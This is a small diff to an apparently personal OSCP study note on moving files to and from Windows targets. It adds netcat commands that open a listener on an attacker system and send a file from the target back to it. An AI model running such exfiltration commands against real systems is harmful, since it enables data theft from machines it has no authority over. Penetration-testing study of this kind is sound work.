linatl/jekyll-gitbook/_posts/OSCP/2021-03-10-windowsfiletransfers.markdown

 On the attacker system:
 > nc 192.168.1.1 80 < file.txt

-Also works the other way, to get files back to the attacker system
+Also works the other way, to get files back to the attacker system:
+On the attacker system:
+> nc -lvp 80 > file.txt
+On the target system:
+> cmd.exe /c ".\nc.exe -w 3 192.168.1.1 80 < file.txt"

 ```